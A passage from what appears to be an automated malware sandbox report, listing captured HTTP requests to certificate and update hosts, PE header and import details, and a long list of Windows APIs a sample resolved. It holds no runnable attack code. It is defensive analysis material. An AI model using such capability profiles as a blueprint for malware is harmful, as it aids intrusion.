- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D HTTP/1.1\r\nCache-Control: max-age = 142986\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 07:40:28 GMT\r\nIf-None-Match: \"5cece5ec-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D HTTP/1.1\r\nCache-Control: max-age = 161796\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 13:00:33 GMT\r\nIf-None-Match: \"5ced30f1-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
- "data": "GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.microsoft.com",
- "version": "1.1",
- "path": "/pki/crl/products/microsoftrootcert.crl",
- "data": "GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 07 Mar 2019 06:00:16 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
- "user-agent": "Microsoft BITS/7.5",
- "method": "HEAD",
- "host": "redirector.gvt1.com",
- "version": "1.1",
- "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
- "data": "HEAD /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetCurrentThread",
- "address": "0x40a014"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40a018"
- },
- {
- "name": "GetTickCount",
- "address": "0x40a01c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x40a020"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40a024"
- },
- {
- "name": "GetLastError",
- "address": "0x40a028"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x40a02c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x40a030"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x40a034"
- },
- {
- "name": "lstrlenA",
- "address": "0x40a038"
- },
- {
- "name": "GetVersionExA",
- "address": "0x40a03c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x40a040"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x40a044"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40a048"
- },
- {
- "name": "VirtualAllocEx",
- "address": "0x40a04c"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40a050"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x40a054"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x40a058"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "DefWindowProcW",
- "address": "0x40a068"
- },
- {
- "name": "LoadStringW",
- "address": "0x40a06c"
- },
- {
- "name": "SetActiveWindow",
- "address": "0x40a070"
- },
- {
- "name": "ReleaseCapture",
- "address": "0x40a074"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x40a078"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40a07c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x40a080"
- },
- {
- "name": "DestroyWindow",
- "address": "0x40a084"
- },
- {
- "name": "RegisterClassW",
- "address": "0x40a088"
- },
- {
- "name": "SendMessageW",
- "address": "0x40a08c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x40a090"
- },
- {
- "name": "SetWindowLongW",
- "address": "0x40a094"
- },
- {
- "name": "LoadIconA",
- "address": "0x40a098"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExW",
- "address": "0x40a000"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x40a004"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x40a00c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetupDecompressOrCopyFileA",
- "address": "0x40a060"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "_exit",
- "address": "0x40a0a0"
- },
- {
- "name": "_c_exit",
- "address": "0x40a0a4"
- },
- {
- "name": "_cexit",
- "address": "0x40a0a8"
- },
- {
- "name": "exit",
- "address": "0x40a0ac"
- },
- {
- "name": "_wcmdln",
- "address": "0x40a0b0"
- },
- {
- "name": "__wgetmainargs",
- "address": "0x40a0b4"
- },
- {
- "name": "_initterm",
- "address": "0x40a0b8"
- },
- {
- "name": "__setusermatherr",
- "address": "0x40a0bc"
- },
- {
- "name": "_adjust_fdiv",
- "address": "0x40a0c0"
- },
- {
- "name": "__p__commode",
- "address": "0x40a0c4"
- },
- {
- "name": "__p__fmode",
- "address": "0x40a0c8"
- },
- {
- "name": "__set_app_type",
- "address": "0x40a0cc"
- },
- {
- "name": "_controlfp",
- "address": "0x40a0d0"
- },
- {
- "name": "__dllonexit",
- "address": "0x40a0d4"
- },
- {
- "name": "_onexit",
- "address": "0x40a0d8"
- },
- {
- "name": "_except_handler3",
- "address": "0x40a0dc"
- },
- {
- "name": "_XcptFilter",
- "address": "0x40a0e0"
- }
- ],
- "dll": "msvcrt.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0002d30a",
- "overlay": {
- "size": "0x00001f00",
- "offset": "0x00025000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0002d30a",
- "icon_hash": null,
- "entrypoint": "0x004083d6",
- "timestamp": "2019-06-12 20:02:55",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00008000",
- "entropy": "5.82",
- "raw_address": "0x00001000",
- "virtual_size": "0x000076b6",
- "characteristics_raw": "0xf0000020"
- },
- {
- "name": ".bss",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00000030",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0000a000",
- "size_of_data": "0x00001000",
- "entropy": "2.39",
- "raw_address": "0x00009000",
- "virtual_size": "0x0000061c",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000b000",
- "size_of_data": "0x0001a000",
- "entropy": "6.12",
- "raw_address": "0x0000a000",
- "virtual_size": "0x00019d54",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00025000",
- "size_of_data": "0x00001000",
- "entropy": "0.68",
- "raw_address": "0x00024000",
- "virtual_size": "0x0000025c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a104",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000008c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00001f00"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000118"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000000e8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e4334085562a74ad98ab8806ba673ef",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 6,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "user32.dll.GetWindowContextHelpId",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.GetConsoleCP",
- "kernel32.dll.CreatePipe",
- "kernel32.dll.ExpandEnvironmentStringsA",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.SetFilePointer",
- "kernel32.dll.SetEndOfFile",
- "kernel32.dll.lstrlenA",
- "kernel32.dll.GetEnvironmentVariableA",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.lstrcmpA",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.ReleaseMutex",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.lstrcatA",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.GetACP",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.Sleep",
- "kernel32.dll.GetFileInformationByHandle",
- "kernel32.dll.GetLastError",
- "kernel32.dll.OutputDebugStringW",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.DeleteFileA",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.lstrcpyA",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.ResetEvent",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.CreateFileMappingA",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.lstrcpynA",
- "kernel32.dll.InterlockedDecrement",
- "kernel32.dll.AddConsoleAliasW",
- "kernel32.dll.SystemTimeToFileTime",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.CreateProcessA",
- "kernel32.dll.AddAtomW",
- "kernel32.dll.CreateDirectoryA",
- "kernel32.dll.OpenMutexW",
- "kernel32.dll.LocalShrink",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.SetFilePointerEx",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.HeapSize",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.SetStdHandle",
- "kernel32.dll.FreeEnvironmentStringsW",
- "kernel32.dll.GetEnvironmentStringsW",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.GetCPInfo",
- "kernel32.dll.GetOEMCP",
- "kernel32.dll.IsValidCodePage",
- "kernel32.dll.FindNextFileA",
- "kernel32.dll.FindFirstFileExA",
- "kernel32.dll.FindClose",
- "kernel32.dll.DeviceIoControl",
- "kernel32.dll.OutputDebugStringA",
- "kernel32.dll.WriteConsoleA",
- "kernel32.dll.GetShortPathNameA",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.GetCommandLineW",
- "kernel32.dll.SetLastError",
- "kernel32.dll.EraseTape",
- "kernel32.dll.GetFileType",
- "kernel32.dll.HeapCreate",
- "kernel32.dll.GetFileSizeEx",
- "kernel32.dll.GlobalGetAtomNameA",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.ReadFile",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.HeapFree",
- "kernel32.dll.GetModuleHandleExW",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.WriteFile",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.FreeLibrary",
- "kernel32.dll.TlsFree",
- "kernel32.dll.LocalFree",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.InitializeSListHead",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.GetStartupInfoW",
- "kernel32.dll.IsProcessorFeaturePresent",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.RaiseException",
- "kernel32.dll.RtlUnwind",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.TlsSetValue",
- "user32.dll.TranslateMessage",
- "user32.dll.BeginPaint",
- "user32.dll.ChildWindowFromPoint",
- "user32.dll.LoadImageW",
- "user32.dll.UnhookWinEvent",
- "user32.dll.GetMenu",
- "user32.dll.GetFocus",
- "user32.dll.GetMenuItemCount",
- "user32.dll.DrawIcon",
- "user32.dll.RegisterClassExA",
- "user32.dll.TrackPopupMenu",
- "user32.dll.wsprintfA",
- "user32.dll.DialogBoxIndirectParamA",
- "user32.dll.IsChild",
- "user32.dll.LoadAcceleratorsA",
- "user32.dll.CharNextW",
- "user32.dll.LoadAcceleratorsW",
- "user32.dll.GetClipboardData",
- "user32.dll.OemToCharA",
- "user32.dll.LoadCursorW",
- "user32.dll.SetDlgItemTextA",
- "user32.dll.wsprintfW",
- "user32.dll.CheckDlgButton",
- "user32.dll.GetDesktopWindow",
- "gdi32.dll.CreateFontA",
- "gdi32.dll.StartDocA",
- "gdi32.dll.CreateDCW",
- "gdi32.dll.SetWindowExtEx",
- "gdi32.dll.SetViewportExtEx",
- "gdi32.dll.CreateMetaFileA",
- "gdi32.dll.TextOutA",
- "gdi32.dll.SetMapMode",
- "gdi32.dll.SetTextColor",
- "winspool.drv.GetPrinterA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegFlushKey",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.GetUserNameW",
- "advapi32.dll.RegOpenKeyW",
- "shell32.dll.ShellExecuteA",
- "shell32.dll.SHGetSpecialFolderPathA",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CoUninitialize",
- "ole32.dll.CoCreateGuid",
- "ole32.dll.CoInitializeSecurity",
- "ole32.dll.CoInitializeEx",
- "ole32.dll.CoInitialize",
- "oleaut32.dll.#8",
- "oleaut32.dll.#6",
- "oleaut32.dll.#2",
- "oleaut32.dll.#9",
- "shlwapi.dll.StrStrA",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "ole32.dll.OleInitialize",
- "cryptbase.dll.SystemFunction036",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "ole32.dll.CreateBindCtx",
- "ole32.dll.CoTaskMemAlloc",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "propsys.dll.PSPropertyBag_WriteDWORD",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "ole32.dll.CoTaskMemFree",
- "comctl32.dll.#236",
- "ole32.dll.CoGetMalloc",
- "propsys.dll.PSPropertyBag_ReadDWORD",
- "propsys.dll.PSPropertyBag_ReadGUID",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.OpenThreadToken",
- "apphelp.dll.ApphelpCheckShellObject",
- "urlmon.dll.CreateUri",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "comctl32.dll.#328",
- "comctl32.dll.#334",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "shell32.dll.#102",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "propsys.dll.PSPropertyBag_ReadStrAlloc",
- "comctl32.dll.#332",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetEntriesInAclW",
- "ntmarta.dll.GetMartaExtensionInterface",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "comctl32.dll.#386",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#338",
- "sechost.dll.ConvertSidToStringSidW",
- "propsys.dll.#430",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegGetValueW",
- "ole32.dll.CoTaskMemRealloc",
- "propsys.dll.InitPropVariantFromStringAsVector",
- "propsys.dll.PSCoerceToCanonicalValue",
- "propsys.dll.PropVariantToStringAlloc",
- "ole32.dll.PropVariantClear",
- "ole32.dll.CoAllowSetForegroundWindow",
- "shell32.dll.SHGetFolderPathW",
- "advapi32.dll.SaferGetPolicyInformation",
- "ntdll.dll.RtlDllShutdownInProgress",
- "comctl32.dll.#329",
- "ole32.dll.OleUninitialize",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "oleaut32.dll.#500",
- "wininet.dll.InternetReadFile",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "rpcrt4.dll.RpcBindingFree",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "cscapi.dll.CscNetApiGetInterface",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaQueryInformationPolicy",
- "netutils.dll.NetApiBufferAllocate",
- "advapi32.dll.LsaFreeMemory",
- "advapi32.dll.LsaClose",
- "netutils.dll.NetApiBufferFree",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.SetConsoleInputExeNameW",
- "rpcrt4.dll.I_RpcSNCHOption",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.ControlService",
- "sechost.dll.QueryServiceStatus",
- "sechost.dll.StartServiceW",
- "secur32.dll.GetUserNameExW",
- "secur32.dll.InitializeSecurityContextW",
- "secur32.dll.FreeCredentialsHandle",
- "secur32.dll.AcquireCredentialsHandleW",
- "secur32.dll.QuerySecurityPackageInfoW",
- "secur32.dll.CompleteAuthToken",
- "secur32.dll.FreeContextBuffer",
- "secur32.dll.GetUserNameExA",
- "winscard.dll.SCardEstablishContext",
- "winscard.dll.SCardReleaseContext",
- "winscard.dll.SCardGetStatusChangeW",
- "winscard.dll.SCardListReadersW",
- "ws2_32.dll.#151",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.#21",
- "ws2_32.dll.#19",
- "ws2_32.dll.#16",
- "ws2_32.dll.#10",
- "ws2_32.dll.#111",
- "ws2_32.dll.#116",
- "ws2_32.dll.#115",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.#4",
- "ws2_32.dll.#23",
- "ws2_32.dll.#11",
- "ws2_32.dll.#3",
- "ws2_32.dll.#18",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.#9",
- "userenv.dll.CreateEnvironmentBlock",
- "userenv.dll.DestroyEnvironmentBlock",
- "dbghelp.dll.MiniDumpWriteDump",
- "wtsapi32.dll.WTSEnumerateSessionsW",
- "ole32.dll.CoSetProxyBlanket",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.TryEnterCriticalSection",
- "kernel32.dll.SizeofResource",
- "kernel32.dll.InitAtomTable",
- "kernel32.dll.SetHandleCount",
- "kernel32.dll.LoadModule",
- "kernel32.dll.ClearCommError",
- "kernel32.dll.GetCommConfig",
- "kernel32.dll.GetCommMask",
- "kernel32.dll.TransmitCommChar",
- "kernel32.dll.GetTapeParameters",
- "kernel32.dll.MulDiv",
- "kernel32.dll.GetSystemTime",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.FileTimeToSystemTime",
- "kernel32.dll.CompareFileTime",
- "kernel32.dll.DosDateTimeToFileTime",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GetNamedPipeInfo",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.lstrcmpiA",
- "kernel32.dll.lstrcpyW",
- "kernel32.dll.lstrcatW",
- "kernel32.dll.lstrlenW",
- "kernel32.dll._lcreat",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.CreateMutexW",
- "kernel32.dll.CreateEventA",
- "kernel32.dll.CreateEventW",
- "kernel32.dll.OpenSemaphoreW",
- "kernel32.dll.OpenWaitableTimerW",
- "kernel32.dll.CancelWaitableTimer",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.FindResourceA",
- "kernel32.dll.GetProfileIntW",
- "kernel32.dll.WriteProfileStringW",
- "kernel32.dll.GetPrivateProfileIntW",
- "kernel32.dll.GetPrivateProfileStringW",
- "kernel32.dll.GetPrivateProfileSectionW",
- "kernel32.dll.GetDriveTypeA",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.GetSystemDirectoryA",
- "kernel32.dll.GetSystemDirectoryW",
- "kernel32.dll.GetTempFileNameA",
- "kernel32.dll.GetSystemWindowsDirectoryA",
- "kernel32.dll.GetCurrentDirectoryA",
- "kernel32.dll.GetDllDirectoryA",
- "kernel32.dll.GetDllDirectoryW",
- "kernel32.dll.GetDiskFreeSpaceA",
- "kernel32.dll.RemoveDirectoryW",
- "kernel32.dll.GetFullPathNameA",
- "kernel32.dll.DefineDosDeviceW",
- "kernel32.dll.GetFileAttributesA",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.GetFileAttributesExA",
- "kernel32.dll.FindFirstFileA",
- "kernel32.dll.SearchPathA",
- "kernel32.dll.SearchPathW",
- "kernel32.dll.CheckRemoteDebuggerPresent",
- "kernel32.dll.ReplaceFileW",
- "kernel32.dll.CreateNamedPipeA",
- "kernel32.dll.FindCloseChangeNotification",
- "kernel32.dll.GetDefaultCommConfigA",
- "kernel32.dll.GetComputerNameExA",
- "kernel32.dll.GetComputerNameExW",
- "kernel32.dll.CancelTimerQueueTimer",
- "kernel32.dll.VerifyVersionInfoW",
- "kernel32.dll.OpenJobObjectA",
- "kernel32.dll.DeleteVolumeMountPointA",
- "kernel32.dll.DeleteVolumeMountPointW",
- "kernel32.dll.GetVolumeNameForVolumeMountPointW",
- "kernel32.dll.GetVolumePathNamesForVolumeNameA",
- "kernel32.dll.GetCurrentActCtx",
- "kernel32.dll.FindActCtxSectionGuid",
- "kernel32.dll.CompareStringA",
- "kernel32.dll.CompareStringW",
- "kernel32.dll.GetCalendarInfoA",
- "kernel32.dll.GetTimeFormatW",
- "kernel32.dll.IsValidLocale",
- "kernel32.dll.GetGeoInfoA",
- "kernel32.dll.GetThreadLocale",
- "kernel32.dll.GetUserDefaultLCID",
- "kernel32.dll.WriteConsoleOutputCharacterW",
- "kernel32.dll.FillConsoleOutputCharacterW",
- "kernel32.dll.GetConsoleFontSize",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.DebugBreakProcess",
- "kernel32.dll.WaitNamedPipeW",
- "kernel32.dll.GetExitCodeProcess",
- "kernel32.dll.lstrcmpiW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.LockResource",
- "kernel32.dll.LoadResource",
- "kernel32.dll.FindResourceW",
- "kernel32.dll.SetHandleInformation",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.GetTimeFormatA",
- "kernel32.dll.FreeResource",
- "kernel32.dll.GetDateFormatA",
- "kernel32.dll.MoveFileExW",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.InterlockedIncrement",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.MoveFileW",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.lstrcmpW",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.SleepEx",
- "kernel32.dll.GetFileTime",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.QueryPerformanceFrequency",
